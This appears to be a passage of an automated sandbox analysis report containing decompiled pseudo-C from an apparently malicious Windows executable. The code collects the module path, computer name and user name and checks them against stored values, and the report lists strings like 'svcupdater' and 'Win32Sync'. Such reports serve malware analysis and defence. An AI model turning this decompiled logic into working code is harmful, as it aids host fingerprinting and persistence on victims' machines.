												_v1088 = 0x11;
												_v1087 = 0x00000078 ^ _v1088;
												_t369 = _v1088 ^ _v1088;
												_v1083 = 0;
												_v1085 = _t369;
												_t428 = 0x00000075 ^ _t369 ^ _t369;
												_v1086 = _t428;
												_v1084 = _t428;
												_v1083 = 0;
												_t242 = E00402530(_t241,  &_v1087);
												asm("movups xmm0, [eax]");
												asm("movups [ebp-0x46c], xmm0");
												asm("movq xmm0, [eax+0x10]");
												 *(_t242 + 0x10) = 0;
												 *(_t242 + 0x14) = 0xf;
												 *_t242 = 0;
												asm("movq [ebp-0x45c], xmm0");
												E00405C60(_t331, 0x443aa4,  &_v1136);
												_t373 = _v1116;
												if(_t373 < 0x10) {
													L35:
													_v8 = 4;
													_t374 = _v1092;
													if(_t374 < 0x10) {
														L39:
														_v8 = 0;
														_t375 = _v1140;
														_v1096 = 0;
														_v1092 = 0xf;
														_v1112 = 0;
														if(_t375 < 0x10) {
															L43:
															_t245 = E00403E40(_t331, _t428, _t445); // executed
															if(_t245 != 0) {
																L83:
																_t376 = _v1060;
																if(_t376 < 0x10) {
																	L87:
																	 *[fs:0x0] = _v16;
																	_pop(_t446);
																	_pop(_t450);
																	return E0041361E(0, _t331, _v20 ^ _t454, _t428, _t446, _t450);
																} else {
																	_t428 = _v1080;
																	_t381 =  &(_t376->i);
																	_t248 = _v1080;
																	if(_t381 < 0x1000) {
																		L86:
																		_push(_t381);
																		E004138AD(_t428);
																		goto L87;
																	} else {
																		_t416 =  *((intOrPtr*)(_t248 - 4));
																		_t337 =  &(_t381[8]);
																		if(_t248 -  *((intOrPtr*)(_t248 - 4)) + 0xfffffffc > 0x1f) {
																			goto L95;
																		} else {
																			goto L86;
																		}
																	}
																}
															} else {
																GetModuleFileNameA(0,  &_v1052, 0x104);
																_t382 =  &_v1052;
																_t429 = _t382 + 1;
																do {
																	_t254 =  *_t382;
																	_t382 = _t382 + 1;
																} while (_t254 != 0);
																E004080A0(_t331, 0x443abc, _t445,  &_v1052, _t382 - _t429);
																_v1056 = 0xff;
																GetComputerNameA( &_v532,  &_v1056); // executed
																GetUserNameA( &_v276,  &_v1056); // executed
																asm("xorps xmm0, xmm0");
																_v1096 = 0;
																_t385 =  &_v276;
																_v1092 = 0;
																asm("movups [ebp-0x454], xmm0");
																_t430 = _t385 + 1;
																do {
																	_t263 =  *_t385;
																	_t385 = _t385 + 1;
																} while (_t263 != 0);
																_push(_t385 - _t430);
																_push( &_v276);
																E00402830(_t331,  &_v1112, _t430, _t445, _t449);
																_v8 = 6;
																_t388 =  &_v532;
																asm("xorps xmm0, xmm0");
																_v1120 = 0;
																asm("movups [ebp-0x46c], xmm0");
																_v1116 = 0;
																_t431 = _t388 + 1;
																do {
																	_t266 =  *_t388;
																	_t388 = _t388 + 1;
																} while (_t266 != 0);
																_push(_t388 - _t431);
																_push( &_v532);
																E00402830(_t331,  &_v1136, _t431, _t445, _t449);
																_v8 = 7;
																_v1085 = 0;
																_v1088 = 0x17;
																_v1085 = 0;
																_v1087 = 0x5c;
																_v1086 = 0x5c;
																_t272 = E00402530( &_v1136,  &_v1087);
																asm("movups xmm0, [eax]");
																asm("movups [ebp-0x484], xmm0");
																asm("movq xmm0, [eax+0x10]");
																asm("movq [ebp-0x474], xmm0");
																 *(_t272 + 0x10) = 0;
																 *(_t272 + 0x14) = 0xf;
																 *_t272 = 0;
																_v8 = 8;
																E004091A0(_t331,  &_v1184, _t445, _v1056,  &_v1160,  &_v1112);
																E00405C60(_t331, "579569\\\\jones",  &_v1184);
																_t396 = _v1164;
																if(_t396 < 0x10) {
																	L54:
																	_v8 = 7;
																	_t397 = _v1140;
																	if(_t397 < 0x10) {
																		L58:
																		_v8 = 6;
																		_t398 = _v1116;
																		if(_t398 < 0x10) {
																			L62:
																			_v8 = 0;
																			_t399 = _v1092;
																			_v1120 = 0;
																			_v1116 = 0xf;
																			_v1136 = 0;
																			if(_t399 < 0x10) {
																				L66:
																				_t451 =  *0x443acc; // 0x2a
																				_t401 =  >=  ?  *0x443ad4 : 0x443ad4;
																				_t428 =  >=  ?  *0x443abc : 0x443abc;
																				_t520 = _t451 -  *0x443ae4; // 0x37
																				if(_t520 != 0) {
																					L82:
																					E00411470(_t331, _t428); // executed
																				} else {
																					_t452 = _t451 - 4;
																					if(_t452 < 0) {
																						L70:
																						if(_t452 == 0xfffffffc) {
																							goto L79;
																						} else {
																							goto L71;
																						}
																					} else {
																						while( *_t428 ==  *_t401) {
																							_t428 = _t428 + 4;
																							_t401 = _t401 + 4;
																							_t452 = _t452 - 4;
																							if(_t452 >= 0) {
																								continue;
																							} else {
																								goto L70;
																							}
																							goto L80;
																						}
																						L71:
																						_t281 =  *_t428;
																						if(_t281 !=  *_t401) {
																							L78:
																							asm("sbb eax, eax");
																							_t279 = _t281 | 0x00000001;
																						} else {
																							if(_t452 == 0xfffffffd) {
																								L79:
																								_t279 = 0;
																							} else {
																								_t173 = _t428 + 1; // 0x18000000
																								_t281 =  *_t173;
																								_t174 = _t401 + 1; // 0x70000000
																								if(_t281 !=  *_t174) {
																									goto L78;
																								} else {
																									if(_t452 == 0xfffffffe) {
																										goto L79;
																									} else {
																										_t175 = _t428 + 2; // 0x1f180000
																										_t281 =  *_t175;
																										_t176 = _t401 + 2; // 0x8e700000
																										if(_t281 !=  *_t176) {
																											goto L78;
																										} else {
																											if(_t452 == 0xffffffff) {
																												goto L79;
																											} else {
																												_t177 = _t428 + 3; // 0x6d1f1800
																												_t281 =  *_t177;
																												_t178 = _t401 + 3; // 0x6d8e7000
																												if(_t281 ==  *_t178) {
																													goto L79;
																												} else {
																													goto L78;
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																					L80:
																					if(_t279 != 0) {
																						goto L82;
																					} else {
																						E00403B40(_t331, _t428, _t445);
																						E00409B10();
																					}
																				}
																				goto L83;
																			} else {
																				_t434 = _v1112;
																				_t402 =  &(_t399->i);
																				_t283 = _v1112;
																				if(_t402 < 0x1000) {
																					L65:
																					_push(_t402);
																					E004138AD(_t434);
																					_t460 = _t460 + 8;
																					goto L66;
																				} else {
																					_t416 =  *((intOrPtr*)(_t283 - 4));
																					_t337 =  &(_t402[8]);
																					if(_t283 -  *((intOrPtr*)(_t283 - 4)) + 0xfffffffc > 0x1f) {
																						goto L94;
																					} else {
																						goto L65;
																					}
																				}
																			}
																		} else {
																			_t435 = _v1136;
																			_t403 =  &(_t398->i);
																			_t287 = _v1136;
																			if(_t403 < 0x1000) {
																				L61:
																				_push(_t403);
																				E004138AD(_t435);
																				_t460 = _t460 + 8;
																				goto L62;
																			} else {
																				_t416 =  *((intOrPtr*)(_t287 - 4));
																				_t337 = _t403 + 0x23;
																				if(_t287 -  *((intOrPtr*)(_t287 - 4)) + 0xfffffffc > 0x1f) {
																					goto L94;
																				} else {
																					goto L61;
																				}
																			}
																		}
																	} else {
																		_t436 = _v1160;
																		_t404 = _t397 + 1;
																		_t291 = _v1160;
																		if(_t404 < 0x1000) {
																			L57:
																			_push(_t404);
																			E004138AD(_t436);
																			_t460 = _t460 + 8;
																			goto L58;
																		} else {
																			_t416 =  *((intOrPtr*)(_t291 - 4));
																			_t337 = _t404 + 0x23;
																			if(_t291 -  *((intOrPtr*)(_t291 - 4)) + 0xfffffffc > 0x1f) {
																				goto L94;
																			} else {
																				goto L57;
																			}
																		}
																	}
																} else {
																	_t437 = _v1184;
																	_t405 = _t396 + 1;
																	_t295 = _v1184;
																	if(_t405 < 0x1000) {
																		L53:
																		_push(_t405);
																		E004138AD(_t437);
																		_t460 = _t460 + 8;
																		goto L54;
																	} else {
																		_t416 =  *((intOrPtr*)(_t295 - 4));
																		_t337 = _t405 + 0x23;
																		if(_t295 -  *((intOrPtr*)(_t295 - 4)) + 0xfffffffc > 0x1f) {
																			goto L94;
																		} else {
																			goto L53;
																		}
																	}
																}
															}
														} else {
															_t428 = _v1160;
															_t406 = _t375 + 1;
															_t299 = _v1160;
															if(_t406 < 0x1000) {
																L42:
																_push(_t406);
																E004138AD(_t428);
																_t460 = _t460 + 8; // executed
																goto L43;
															} else {
																_t416 =  *((intOrPtr*)(_t299 - 4));
																_t337 = _t406 + 0x23;
																if(_t299 -  *((intOrPtr*)(_t299 - 4)) + 0xfffffffc > 0x1f) {
																	goto L93;
																} else {
																	goto L42;
																}
															}
														}
													} else {
														_t428 = _v1112;
														_t407 =  &(_t374->i);
														_t303 = _v1112;
														if(_t407 < 0x1000) {
															L38:
															_push(_t407);
															E004138AD(_t428);
															_t460 = _t460 + 8;
															goto L39;
														} else {
															_t416 =  *((intOrPtr*)(_t303 - 4));
															_t337 = _t407 + 0x23;
															if(_t303 -  *((intOrPtr*)(_t303 - 4)) + 0xfffffffc > 0x1f) {
																goto L93;
															} else {
																goto L38;
															}
														}
													}
												} else {
													_t428 = _v1136;
													_t408 =  &(_t373->i);
													_t307 = _v1136;
													if(_t408 < 0x1000) {
														L34:
														_push(_t408);
														E004138AD(_t428);
														_t460 = _t460 + 8;
														goto L35;
													} else {
														_t416 =  *((intOrPtr*)(_t307 - 4));
														_t337 = _t408 + 0x23;
														if(_t307 -  *((intOrPtr*)(_t307 - 4)) + 0xfffffffc > 0x1f) {
															goto L93;
														} else {
															goto L34;
														}
													}
												}
											}
										} else {
											_t438 = _v1160;
											_t409 = _t359 + 1;
											_t311 = _v1160;
											if(_t409 < 0x1000) {
												L27:
												_push(_t409);
												E004138AD(_t438);
												_t459 = _t459 + 8;
												goto L28;
											} else {
												_t416 =  *((intOrPtr*)(_t311 - 4));
												_t337 = _t409 + 0x23;
												if(_t311 -  *((intOrPtr*)(_t311 - 4)) + 0xfffffffc > 0x1f) {
													goto L91;
												} else {
													goto L27;
												}
											}
										}
									} else {
										_t439 = _v1112;
										_t410 =  &(_t358->i);
										_t315 = _v1112;
										if(_t410 < 0x1000) {
											L23:
											_push(_t410);
											E004138AD(_t439);
											_t459 = _t459 + 8;
											goto L24;
										} else {
											_t416 =  *((intOrPtr*)(_t315 - 4));
											_t337 = _t410 + 0x23;
											if(_t315 -  *((intOrPtr*)(_t315 - 4)) + 0xfffffffc > 0x1f) {
												goto L91;
											} else {
												goto L23;
											}
										}
									}
								} else {
									_t440 = _v1136;
									_t411 =  &(_t357->i);
									_t319 = _v1136;
									if(_t411 < 0x1000) {
										L19:
										_push(_t411);
										E004138AD(_t440);
										_t459 = _t459 + 8;
										goto L20;
									} else {
										_t416 =  *((intOrPtr*)(_t319 - 4));
										_t337 = _t411 + 0x23;
										if(_t319 -  *((intOrPtr*)(_t319 - 4)) + 0xfffffffc > 0x1f) {
											goto L91;
										} else {
											goto L19;
										}
									}
								}
							}
						} else {
							_t441 = _v1160;
							_t412 = _t343 + 1;
							_t323 = _v1160;
							if(_t412 < 0x1000) {
								L12:
								_push(_t412);
								E004138AD(_t441);
								_t458 = _t458 + 8;
								goto L13;
							} else {
								_t416 =  *((intOrPtr*)(_t323 - 4));
								_t337 = _t412 + 0x23;
								if(_t323 -  *((intOrPtr*)(_t323 - 4)) + 0xfffffffc > 0x1f) {
									goto L89;
								} else {
									goto L12;
								}
							}
						}
					} else {
						_t442 = _v1112;
						_t413 =  &(_t342->i);
						_t327 = _v1112;
						if(_t413 < 0x1000) {
							L8:
							_push(_t413);
							E004138AD(_t442);
							_t458 = _t458 + 8;
							goto L9;
						} else {
							_t416 =  *((intOrPtr*)(_t327 - 4));
							_t337 = _t413 + 0x23;
							if(_t327 -  *((intOrPtr*)(_t327 - 4)) + 0xfffffffc > 0x1f) {
								L89:
								E0041805F(_t331, _t337, _t416);
								L90:
								E00401BD0(_t331, _t337, _t416);
								L91:
								E0041805F(_t331, _t337, _t416);
								L92:
								E00401BD0(_t331, _t337, _t416);
								L93:
								E0041805F(_t331, _t337, _t416);
								L94:
								E0041805F(_t331, _t337, _t416);
								L95:
								E0041805F(_t331, _t337, _t416);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t337 - 0x18)) + 4)) + _t337 - 0x18)) = 0x43ea88;
								_t189 =  *((intOrPtr*)(_t337 - 0x18)) + 4; // 0x43fa70
								_t190 =  *_t189 - 0x18; // 0x43fa58
								_t217 = _t190;
								 *((intOrPtr*)( *_t189 + _t337 - 0x1c)) = _t217;
								return _t217;
							} else {
								goto L8;
							}
						}
					}
				}
			}

0x004041d0
0x004041d1
0x004041e1
0x004041e7
0x004041ec
0x004041ee
0x004041f7
0x0040420c
0x00404212
0x00404215
0x0040421f
0x00404225
0x0040422f
0x00404236
0x00404240
0x00404240
0x00404242
0x00404243
0x0040424f
0x00404250
0x00404257
0x0040425e
0x00404267
0x0040426f
0x00404276
0x0040427c
0x00404282
0x00404289
0x00404290
0x00404290
0x00404292
0x00404293
0x0040429c
0x0040429e
0x004042aa
0x00404b24
0x00000000
0x004042b0
0x004042be
0x004042db
0x004042eb
0x004042f5
0x004042fa
0x00404303
0x00404308
0x00404311
0x00404342
0x00404342
0x00404346
0x0040434c
0x00404356
0x00404360
0x0040436a
0x0040439b
0x0040439b
0x004043a5
0x004043ad
0x004043b4
0x004043ba
0x004043c0
0x004043c7
0x004043ca
0x004043d0
0x004043d0
0x004043d2
0x004043d3
0x004043d9
0x004043df
0x00000000
0x004043e5
0x004043f2
0x0040440f
0x0040441f
0x00404429
0x0040442e
0x00404431
0x00404437
0x00404448
0x00404456
0x00404458
0x00404461
0x00404467
0x00404469
0x00404475
0x0040447e
0x00404485
0x0040448f
0x00404492
0x00404499
0x0040449e
0x004044a5
0x004044ac
0x004044b6
0x004044be
0x004044c3
0x004044cc
0x004044fd
0x004044fd
0x00404501
0x0040450a
0x0040453b
0x0040453b
0x0040453f
0x00404545
0x0040454f
0x00404559
0x00404563
0x00404594
0x00404594
0x0040459e
0x004045a6
0x004045ad
0x004045b3
0x004045b9
0x004045c0
0x004045c3
0x004045c3
0x004045c5
0x004045c6
0x004045ca
0x004045cc
0x004045d0
0x00000000
0x004045d6
0x004045e3
0x00404600
0x00404610
0x0040461a
0x0040461f
0x00404622
0x00404628
0x00404639
0x00404647
0x00404649
0x00404652
0x00404658
0x0040465a
0x00404666
0x0040466f
0x00404676
0x00404680
0x00404683
0x0040468a
0x0040468f
0x00404696
0x0040469d
0x004046a7
0x004046af
0x004046b4
0x004046bd
0x004046ee
0x004046ee
0x004046f2
0x004046fb
0x0040472c
0x0040472c
0x00404730
0x00404736
0x00404740
0x0040474a
0x00404754
0x00404785
0x00404785
0x0040478c
0x00404ad1
0x00404ad1
0x00404ada
0x00404b07
0x00404b0c
0x00404b14
0x00404b15
0x00404b23
0x00404adc
0x00404adc
0x00404ae2
0x00404ae3
0x00404aeb
0x00404afd
0x00404afd
0x00404aff
0x00000000
0x00404aed
0x00404aed
0x00404af0
0x00404afb
0x00000000
0x00000000
0x00000000
0x00000000
0x00404afb
0x00404aeb
0x00404792
0x004047a0
0x004047a6
0x004047ac
0x004047b0
0x004047b0
0x004047b2
0x004047b3
0x004047c6
0x004047d1
0x004047e3
0x004047f7
0x004047fd
0x00404800
0x0040480a
0x00404810
0x0040481a
0x00404821
0x00404824
0x00404824
0x00404826
0x00404827
0x00404833
0x00404834
0x0040483b
0x00404840
0x00404844
0x0040484a
0x0040484d
0x00404857
0x0040485e
0x00404868
0x00404870
0x00404870
0x00404872
0x00404873
0x0040487f
0x00404880
0x00404887
0x0040488e
0x00404894
0x0040489d
0x004048a5
0x004048ae
0x004048ba
0x004048c7
0x004048cc
0x004048cf
0x004048d6
0x004048db
0x004048e3
0x004048ea
0x004048f1
0x004048fa
0x00404912
0x00404923
0x00404928
0x00404931
0x00404962
0x00404962
0x00404966
0x0040496f
0x004049a0
0x004049a0
0x004049a4
0x004049ad
0x004049de
0x004049de
0x004049e2
0x004049e8
0x004049f2
0x004049fc
0x00404a06
0x00404a37
0x00404a43
0x00404a4e
0x00404a5c
0x00404a63
0x00404a69
0x00404acc
0x00404acc
0x00404a6b
0x00404a6b
0x00404a6e
0x00404a81
0x00404a84
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a70
0x00404a70
0x00404a76
0x00404a79
0x00404a7c
0x00404a7f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a7f
0x00404a86
0x00404a86
0x00404a8a
0x00404ab3
0x00404ab3
0x00404ab5
0x00404a8c
0x00404a8f
0x00404aba
0x00404aba
0x00404a91
0x00404a91
0x00404a91
0x00404a94
0x00404a97
0x00000000
0x00404a99
0x00404a9c
0x00000000
0x00404a9e
0x00404a9e
0x00404a9e
0x00404aa1
0x00404aa4
0x00000000
0x00404aa6
0x00404aa9
0x00000000
0x00404aab
0x00404aab
0x00404aab
0x00404aae
0x00404ab1
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ab1
0x00404aa9
0x00404aa4
0x00404a9c
0x00404a97
0x00404a8f
0x00404a8a
0x00404abc
0x00404abe
0x00000000
0x00404ac0
0x00404ac0
0x00404ac5
0x00404ac5
0x00404abe
0x00000000
0x00404a08
0x00404a08
0x00404a0e
0x00404a0f
0x00404a17
0x00404a2d
0x00404a2d
0x00404a2f
0x00404a34
0x00000000
0x00404a19
0x00404a19
0x00404a1c
0x00404a27
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a27
0x00404a17
0x004049af
0x004049af
0x004049b5
0x004049b6
0x004049be
0x004049d4
0x004049d4
0x004049d6
0x004049db
0x00000000
0x004049c0
0x004049c0
0x004049c3
0x004049ce
0x00000000
0x00000000
0x00000000
0x00000000
0x004049ce
0x004049be
0x00404971
0x00404971
0x00404977
0x00404978
0x00404980
0x00404996
0x00404996
0x00404998
0x0040499d
0x00000000
0x00404982
0x00404982
0x00404985
0x00404990
0x00000000
0x00000000
0x00000000
0x00000000
0x00404990
0x00404980
0x00404933
0x00404933
0x00404939
0x0040493a
0x00404942
0x00404958
0x00404958
0x0040495a
0x0040495f
0x00000000
0x00404944
0x00404944
0x00404947
0x00404952
0x00000000
0x00000000
0x00000000
0x00000000
0x00404952
0x00404942
0x00404931
0x00404756
0x00404756
0x0040475c
0x0040475d
0x00404765
0x0040477b
0x0040477b
0x0040477d
0x00404782
0x00000000
0x00404767
0x00404767
0x0040476a
0x00404775
0x00000000
0x00000000
0x00000000
0x00000000
0x00404775
0x00404765
0x004046fd
0x004046fd
0x00404703
0x00404704
0x0040470c
0x00404722
0x00404722
0x00404724
0x00404729
0x00000000
0x0040470e
0x0040470e
0x00404711
0x0040471c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040471c
0x0040470c
0x004046bf
0x004046bf
0x004046c5
0x004046c6
0x004046ce
0x004046e4
0x004046e4
0x004046e6
0x004046eb
0x00000000
0x004046d0
0x004046d0
0x004046d3
0x004046de
0x00000000
0x00000000
0x00000000
0x00000000
0x004046de
0x004046ce
0x004046bd
0x00404565
0x00404565
0x0040456b
0x0040456c
0x00404574
0x0040458a
0x0040458a
0x0040458c
0x00404591
0x00000000
0x00404576
0x00404576
0x00404579
0x00404584
0x00000000
0x00000000
0x00000000
0x00000000
0x00404584
0x00404574
0x0040450c
0x0040450c
0x00404512
0x00404513
0x0040451b
0x00404531
0x00404531
0x00404533
0x00404538
0x00000000
0x0040451d
0x0040451d
0x00404520
0x0040452b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040452b
0x0040451b
0x004044ce
0x004044ce
0x004044d4
0x004044d5
0x004044dd
0x004044f3
0x004044f3
0x004044f5
0x004044fa
0x00000000
0x004044df
0x004044df
0x004044e2
0x004044ed
0x00000000
0x00000000
0x00000000
0x00000000
0x004044ed
0x004044dd
0x004044cc
0x0040436c
0x0040436c
0x00404372
0x00404373
0x0040437b
0x00404391
0x00404391
0x00404393
0x00404398
0x00000000
0x0040437d
0x0040437d
0x00404380
0x0040438b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040438b
0x0040437b
0x00404313
0x00404313
0x00404319
0x0040431a
0x00404322
0x00404338
0x00404338
0x0040433a
0x0040433f
0x00000000
0x00404324
0x00404324
0x00404327
0x00404332
0x00404b29
0x00404b29
0x00404b2e
0x00404b2e
0x00404b33
0x00404b33
0x00404b38
0x00404b38
0x00404b3d
0x00404b3d
0x00404b42
0x00404b42
0x00404b47
0x00404b47
0x00404b4c
0x00404b4d
0x00404b4e
0x00404b4f
0x00404b56
0x00404b61
0x00404b64
0x00404b64
0x00404b67
0x00404b6b
0x00000000
0x00000000
0x00000000
0x00404332
0x00404322
0x00404311

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,35200185), ref: 0040420C
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 004047A0
GetComputerNameA.KERNEL32 ref: 004047E3
GetUserNameA.ADVAPI32(?,000000FF), ref: 004047F7

Strings

579569\\user, xrefs: 0040491D
svcupdater, xrefs: 00404414, 00404605
Win32Sync, xrefs: 004042E0
H, xrefs: 00404437

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Name$ComputerFileFolderModulePathUser
String ID: 579569\\user$H$Win32Sync$svcupdater
API String ID: 1270763117-1035816080
Opcode ID: 2ef804ab9626ff62bdaef6caddefa6f5a3d2f065316b7c453b9588f158b81ea4
Instruction ID: bcccf27192deba0bf1db5f30995bc09525aaf02faf2ce9dda9fcf5923b5ff05b
Opcode Fuzzy Hash: 2ef804ab9626ff62bdaef6caddefa6f5a3d2f065316b7c453b9588f158b81ea4
Instruction Fuzzy Hash: 6242F3B19001588BDB18CB28CD947EDBB75AB82304F5482E9E249772C2D7386BC9CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0042E727 Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E0042E727(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v40;
				signed int _v48;
				void _v52;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				signed int _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t263 = E0042E475(__ecx,  &_v76, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v52, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				if(_v40 != _t264) {
					_t114 = E00429762(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v24 = _v24 & 0x00000000;
						_v28 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v20 =  !(_a16 >> 7) & 1;
						_push( &_v28);
						_push(_a12);
						memcpy(_t276,  &_v52, 1 << 2);
						_t196 = 0;
						_t122 = E0042E3E0(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v52;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v52 | 0x00000040;
								}
								_v5 = _t124;
								E004296AD(_t196,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v16 = _t241;
								_v52 = _t241;
								 *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x444b30 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v5 = 0;
									_push( &_v5);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v52, _t205 << 2);
									_t134 = E0042E192(_t189,  &_v52 + _t205 + _t205,  &_v52);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(_t267 == 0) {
										 *((char*)( *((intOrPtr*)(0x444b30 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v5;
										 *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v16 & 0x00000048;
										if((_v16 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x444b30 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v48;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v48 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v28);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v52, _t214 << 2);
											_t246 = E0042E3E0();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x444b30 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E0041C9F9(GetLastError());
											 *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00429875( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E0042E5EF(_t204,  *_t189);
									__eflags = _t267;
									if(_t267 == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E00421AC3();
									return _t267;
								}
							}
							_t271 = GetLastError();
							E0041C9F9(_t271);
							 *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E0041CA53())) = 0xd;
							}
							goto L2;
						}
						_t233 = _v48;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x444b30 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0041C9F9(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v48 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v28);
						_push(_a12);
						memcpy(_t285,  &_v52, _t238 << 2);
						_t196 = 0;
						_t253 = E0042E3E0();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0041CA40()) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E0041CA53())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0041CA40()) =  *_t186 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E0041CA53()));
				}
			}

0x0042e74a
0x0042e74e
0x0042e74f
0x0042e74f
0x0042e74f
0x0042e751
0x0042e757
0x0042e772
